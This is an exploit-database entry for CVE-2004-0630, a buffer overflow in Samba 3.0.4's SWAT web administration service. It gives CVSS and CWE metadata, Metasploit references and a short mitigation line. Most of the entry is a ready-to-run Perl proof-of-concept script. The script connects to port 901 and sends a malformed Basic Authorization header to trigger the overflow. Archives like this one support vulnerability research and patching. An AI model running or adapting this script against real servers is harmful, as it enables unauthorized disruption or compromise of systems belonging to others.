Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow

vendor:

Samba

by:

Noam Rathaus

7.5

CVSS

HIGH

Buffer Overflow

CWE

Product Name: Samba

Affected Version From: 3.0.4

Affected Version To: 3.0.4

Patch Exists: NO

Related CWE: CVE-2004-0630

CPE: a:samba:samba:3.0.4

Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-78348ea2-ec91-11d8-b913-000c41e2cdad/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2004-0630/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2004-0630/

Other Scripts:

Platforms Tested: Linux

2004

Samba 3.0.4 and prior’s SWAT Authorization Buffer Overflow

This exploit targets a buffer overflow vulnerability in Samba version 3.0.4 and prior. It allows an attacker to execute arbitrary code by sending a specially crafted HTTP request to the SWAT service.

Mitigation:

Update to a patched version of Samba.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1\r
Host: $host:901\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1\r
Accept: text/xml\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Keep-Alive: 300\r
Connection: keep-alive\r
Authorization: Basic =\r
\r
";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while (<$remote>)
{
 print $_;
}
print "\n";

close $remote;

# milw0rm.com [2004-07-22]